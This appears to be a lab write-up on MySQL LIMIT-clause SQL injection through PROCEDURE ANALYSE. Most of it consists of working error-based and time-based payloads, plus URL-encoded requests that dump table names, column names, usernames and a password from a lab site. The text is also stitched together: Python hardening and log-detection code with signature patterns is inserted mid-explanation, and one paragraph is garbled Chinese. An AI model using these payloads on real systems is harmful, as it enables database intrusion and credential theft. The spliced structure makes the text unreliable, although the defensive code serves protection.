
mysql 5.6.6 - Injection via the LIMIT clause in MySQL (this method applies only to MySQL versions between 5.0.0 and 5.6.6)

Published: 2025/1/21 | Database | 豆豆

The SQL statement looks like the following (this method applies only to MySQL versions between 5.0.0 and 5.6.6):

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT (injection point)

The crux is that the statement contains an ORDER BY. In MySQL, UNION can appear before ORDER BY, so if there were no ORDER BY ahead of the injection point a UNION-based approach would work; here, though, the injection point sits after the ORDER BY clause.

Let's first look at the SELECT syntax in the MySQL 5.x documentation:
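As an added illustration of the fix (this is not code from the original write-up; the `article` table, the size caps and the helper names are assumptions), the vulnerable way of building this query is shown beside a hardened version that accepts only bounded integers for the pagination parameters and hands them to the driver as bound parameters:

```python
import re

MAX_PAGE_SIZE = 100      # largest page the endpoint will serve (assumed limit)
MAX_OFFSET = 1_000_000   # cap on the offset, also bounds the work MySQL does

# The only shape a pagination value may have: 1-7 ASCII digits.
# str.isdigit() is deliberately not used, since it also accepts Unicode
# digit characters that int() then rejects.
_DIGITS = re.compile(r"[0-9]{1,7}")


def build_query_unsafe(start, num):
    """Vulnerable form: the raw request strings are pasted into the SQL text,
    so anything after the number (PROCEDURE ..., a trailing #) reaches MySQL."""
    return (
        "SELECT id, title FROM article WHERE id > 0 "
        f"ORDER BY id LIMIT {start},{num}"
    )


def parse_page_param(raw, *, default, upper):
    """Accept only a plain non-negative decimal integer, capped at `upper`.

    Anything else (spaces, keywords, comment markers) is rejected outright
    rather than 'cleaned', so a payload can never be partially accepted."""
    if raw is None or raw == "":
        return default
    if not isinstance(raw, str) or _DIGITS.fullmatch(raw) is None:
        raise ValueError(
            f"pagination parameter must be a non-negative integer, got {raw!r}"
        )
    return min(int(raw), upper)


# The SQL text is a constant; only the two integers vary at run time.
SAFE_SQL = (
    "SELECT id, title FROM article WHERE id > 0 "
    "ORDER BY id LIMIT %s, %s"
)


def build_query_safe(start, num):
    """Hardened form: returns the constant SQL and the validated parameters
    to pass to cursor.execute(), so the LIMIT clause cannot grow new clauses."""
    offset = parse_page_param(start, default=0, upper=MAX_OFFSET)
    count = parse_page_param(num, default=10, upper=MAX_PAGE_SIZE)
    return SAFE_SQL, (offset, count)


if __name__ == "__main__":
    probe = "0 PROCEDURE ANALYSE(1)#"   # the request value from the write-up
    print(build_query_unsafe(probe, "1"))
    print(build_query_safe("8", "1"))
    try:
        build_query_safe(probe, "1")
    except ValueError as exc:
        print("rejected:", exc)
```

With mysqlclient or PyMySQL, `cursor.execute(SAFE_SQL, params)` renders the two integers as bare digits, which MySQL accepts in LIMIT; server-side prepared statements also allow placeholders there. Casting to int, as PHP's `(int)` would, also neutralises the payload, but rejecting the request makes the probe visible in the error log instead of silently serving page 0.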

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
    [HIGH_PRIORITY]
    [STRAIGHT_JOIN]
    [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
    [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

在LIMIT后面可以跟兩個(gè)函數(shù),PROCEDURE 和 INTO,INTO除非有寫(xiě)入shell的權(quán)限,否則是無(wú)法利用的,這里的重點(diǎn)是 PROCEDURE 關(guān)鍵字.MySQL默認(rèn)可用的存儲(chǔ)過(guò)程只有 ANALYSE。

嘗試用這個(gè)存儲(chǔ)過(guò)程:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE accepts two arguments, so try it with two:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

Embedding a SQL expression inside ANALYSE, sleep is not executed, but error-based injection works:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

If error-based injection is not available, time-based injection is also possible; sleep does not work directly here, so BENCHMARK has to be used instead:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

1. Using PROCEDURE ANALYSE:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0%20PROCEDURE%20ANALYSE(1)%23&num=1

Can't use ORDER clause with this procedure

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

2. Dumping table names with error-based injection:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=8&num=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()))),1)%23

XPATH syntax error: ':article,user'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

Table names obtained: article,user

3. Dumping column names:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x61727469636c65))),1)%23%20&num=100%20%23

XPATH syntax error: ':id,title,contents,isread'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

Column names of the article table: id,title,contents,isread

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x75736572))),1)%23%20&num=100%20%23

XPATH syntax error: ':id,username,password,lastloginI'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

Likewise, the column names of the user table: id,username,password,lastloginI

4. Dumping field values:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(username)%20from%20user))),1)%23%20&num=1

XPATH syntax error: ':user,admin,flag'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

Querying the username column of the user table shows that one of the rows is flag, so the password field of the flag row can be read directly:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=6%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(select%20group_concat(password)%20from%20user%20where%20username=0x666c6167))),1)%23%20&num=1

XPATH syntax error: ':myflagishere'

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli5_5ba0bba6a6d1b30b956843f757889552/index.php on line 51

Flag obtained: myflagishere
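An added detection example for the error-based and time-based payloads above and for the four-step walkthrough (this is not part of the original write-up; the client addresses, timestamps and log formats are constructed, and the query strings are the ones shown in the requests above). It scans web-access-log lines for the request shapes this technique leaves and application-log lines for the two MySQL error strings it produces:

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format). Addresses and
# timestamps are hypothetical; the query strings mirror the requests above.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [21/Jan/2025:10:00:01 +0000] "GET /index.php?start=8&num=1 HTTP/1.1" 200 512
10.0.0.5 - - [21/Jan/2025:10:00:03 +0000] "GET /index.php?start=16&num=8 HTTP/1.1" 200 1201
10.0.0.9 - - [21/Jan/2025:10:00:07 +0000] "GET /index.php?start=0%20PROCEDURE%20ANALYSE(1)%23&num=1 HTTP/1.1" 200 233
10.0.0.9 - - [21/Jan/2025:10:00:09 +0000] "GET /index.php?start=8&num=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)%23 HTTP/1.1" 200 240
10.0.0.9 - - [21/Jan/2025:10:00:15 +0000] "GET /index.php?start=6%20procedure%20analyse((select%20extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1)%20LIKE%205,%20BENCHMARK(5000000,SHA1(1)),1))))),1)%23&num=1 HTTP/1.1" 200 240
"""

# Constructed application-log lines: the PHP page above echoes the MySQL
# error text, and a server-side error log records the same strings.
SAMPLE_APP_LOG = """\
[21-Jan-2025 10:00:07] PHP Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in index.php on line 51
[21-Jan-2025 10:00:07] DB error 1386: Can't use ORDER clause with this procedure
[21-Jan-2025 10:00:09] DB error 1105: XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'
[21-Jan-2025 10:01:00] User login ok
"""

# Parameter names that should only ever carry integers (assumed for this app).
PAGINATION_PARAMS = {"start", "num", "limit", "offset", "page"}

# Query-string signatures of the LIMIT-clause technique described above.
SIGNATURES = [
    ("procedure-analyse", re.compile(r"procedure\s+analyse\s*\(", re.I)),
    ("error-based-extractvalue", re.compile(r"extractvalue\s*\(", re.I)),
    ("time-based-benchmark", re.compile(r"\b(?:benchmark|sleep)\s*\(", re.I)),
]

# Database error strings that this technique produces on the server side.
ERROR_SIGNATURES = [
    ("procedure-with-order-by", re.compile(r"Can't use ORDER clause with this procedure")),
    ("xpath-error-leak", re.compile(r"XPATH syntax error:")),
]

# client ip, timestamp and request target out of a combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/')


def inspect_target(target):
    """Return a list of (param, rule) findings for one request target."""
    findings = []
    # keep_blank_values so a bare "start=" is still seen as a pagination value
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    for name, value in params:
        # generic rule: a pagination parameter that is not a plain integer
        if name.lower() in PAGINATION_PARAMS and not value.isdigit():
            findings.append((name, "non-numeric-pagination-value"))
        # specific rules: the functions this technique relies on
        for rule, pattern in SIGNATURES:
            if pattern.search(value):
                findings.append((name, rule))
    return findings


def scan_access_log(text):
    """Return (client_ip, timestamp, findings) for every line that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        findings = inspect_target(target)
        if findings:
            hits.append((ip, ts, findings))
    return hits


def scan_app_log(text):
    """Return the names of the error-string rules matched, in log order."""
    hits = []
    for line in text.splitlines():
        for rule, pattern in ERROR_SIGNATURES:
            if pattern.search(line):
                hits.append(rule)
    return hits


if __name__ == "__main__":
    for ip, ts, findings in scan_access_log(SAMPLE_ACCESS_LOG):
        print(ip, ts, findings)
    print(scan_app_log(SAMPLE_APP_LOG))
```

The cheapest rule is the generic one: a pagination parameter that is not a plain integer is anomalous whatever follows the number, so it also catches variants that avoid the ANALYSE, extractvalue and BENCHMARK keywords. The error-string rule stays useful once the application stops echoing MySQL errors to the client, because the same text still reaches the server-side log.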
